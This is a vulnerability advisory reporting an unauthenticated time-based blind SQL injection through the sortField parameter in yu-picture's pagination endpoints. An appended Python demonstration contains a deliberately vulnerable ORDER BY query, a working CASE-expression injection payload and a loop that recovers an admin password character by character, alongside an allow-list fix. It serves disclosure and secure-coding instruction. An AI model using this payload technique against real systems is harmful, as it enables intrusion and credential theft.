Submission #798612: liyupi yu-picture <= 0.0.1-SNAPSHOT SQL Injection

Title: liyupi yu-picture <= 0.0.1-SNAPSHOT SQL Injection
Description: yu-picture is an enterprise-level image sharing platform based on Vue 3 + Spring Boot + MyBatis-Plus. Multiple pagination query endpoints (POST /api/picture/list/page/vo, POST /api/space/list/page/vo) are accessible without authentication and accept a user-controlled sortField parameter that is directly concatenated into the SQL ORDER BY clause via the MyBatis-Plus orderBy() method without any validation or parameterization. An unauthenticated remote attacker can exploit this time-based blind SQL injection to extract arbitrary data from the database, including user credentials and admin passwords. The vulnerability exists in PictureServiceImpl.java (L336), SpaceServiceImpl.java (L224), and UserServiceImpl.java (L240), all sharing the same vulnerable pattern in the PageRequest base class.
Source: https://github.com/liyupi/yu-picture/issues/4
User: anch0r (UID 96691)
Submitted: 2026-04-07 10:29 AM (21 days ago)
Moderation: 2026-04-26 03:19 AM (19 days later)
Status: Accepted
VulDB Entry: 359633 [liyupi yu-picture up to a053632c41340152bf75b66b3c543d129123d8ec MyBatis-Plus PictureServiceImpl.java PageRequest sortField SQL Injection]
Points: 20
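
The following is an added example, not code from yu-picture or from the submitter. It models the pattern the description reports (a client-supplied sortField placed verbatim into ORDER BY) next to the allow-list fix, and drives the flawed variant with a blind-inference payload to show why an ORDER BY sink is enough to read other tables. It is written in Python against an in-memory SQLite database rather than the project's Java, MyBatis-Plus and MySQL stack, so the oracle is boolean (row order flips with the guess) instead of the time-based one the report describes; the sink being exercised is the same. The table and column names, the sample rows, the endpoint-side parameter names sortField/sortOrder, and the request-field-to-column mapping are all assumptions.

```python
import sqlite3

# Constructed sample data standing in for the platform's tables. The real yu-picture
# schema and column names are not shown on the page; these are assumptions.
SAMPLE_PICTURES = [(1, "sunset", 3), (2, "harbor", 1), (3, "alps", 2)]
SAMPLE_USERS = [(1, "admin", "s3cret")]

# Request-side sort field names mapped to the columns they may reach (assumed names).
# Only values of these dicts ever appear in SQL text.
SORT_COLUMNS = {"id": "id", "name": "name", "spaceId": "space_id"}
SORT_ORDERS = {"ascend": "ASC", "descend": "DESC"}


def make_db():
    """In-memory SQLite database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE picture (id INTEGER, name TEXT, space_id INTEGER);"
        "CREATE TABLE user (id INTEGER, user_account TEXT, user_password TEXT);"
    )
    conn.executemany("INSERT INTO picture VALUES (?, ?, ?)", SAMPLE_PICTURES)
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def list_pictures_vulnerable(conn, sort_field, sort_order):
    """Flawed pattern: the request's sortField lands verbatim in ORDER BY.

    Identifiers cannot be bound as parameters, so a '?' placeholder is not an
    option here; whatever the client sends becomes part of the statement.
    """
    direction = "ASC" if sort_order == "ascend" else "DESC"
    sql = f"SELECT id FROM picture ORDER BY {sort_field} {direction}"
    return [row[0] for row in conn.execute(sql)]


def list_pictures_hardened(conn, sort_field, sort_order):
    """Fixed pattern: sortField and sortOrder are resolved through allow-lists.

    Anything outside the allow-list is rejected rather than sanitized, so the
    SQL text only ever contains server-chosen column names and directions.
    """
    column = SORT_COLUMNS.get(sort_field)
    direction = SORT_ORDERS.get(sort_order)
    if column is None or direction is None:
        raise ValueError(f"unsupported sort parameters: {sort_field!r}, {sort_order!r}")
    sql = f"SELECT id FROM picture ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql)]


def hardened_rejects(conn, sort_field, sort_order="ascend"):
    """True if the hardened query refuses the given sort parameters."""
    try:
        list_pictures_hardened(conn, sort_field, sort_order)
    except ValueError:
        return True
    return False


def guess_is_correct(conn, position, candidate):
    """Blind-inference oracle through the ORDER BY sink.

    The payload is a CASE expression: when the guessed character is right the
    rows sort by id, otherwise by -id, so the returned order leaks one bit.
    """
    payload = (
        "(CASE WHEN (SELECT substr(user_password, {pos}, 1) FROM user "
        "WHERE user_account = 'admin') = '{ch}' THEN id ELSE -id END)"
    ).format(pos=position, ch=candidate)
    return list_pictures_vulnerable(conn, payload, "ascend") == [1, 2, 3]


def recover_password(conn, max_length, alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Recover the admin password one character at a time via the oracle."""
    recovered = ""
    for position in range(1, max_length + 1):
        for ch in alphabet:
            if guess_is_correct(conn, position, ch):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of value, or a character outside the alphabet
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, sortField=name:", list_pictures_vulnerable(db, "name", "ascend"))
    print("recovered via ORDER BY oracle:", recover_password(db, 10))
    print("hardened rejects payload:", hardened_rejects(db, "(CASE WHEN 1=1 THEN id ELSE -id END)"))
```

Because a column name is an identifier, not a value, no driver can bind it as a parameter; the fix has to be an allow-list that maps the client's field names onto the server's column names, as list_pictures_hardened does, and the direction should be looked up the same way rather than compared with a single string. Since the description places the shared pattern in the PageRequest base class used by all three services, the mapping belongs at that shared layer so every pagination endpoint inherits the check.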
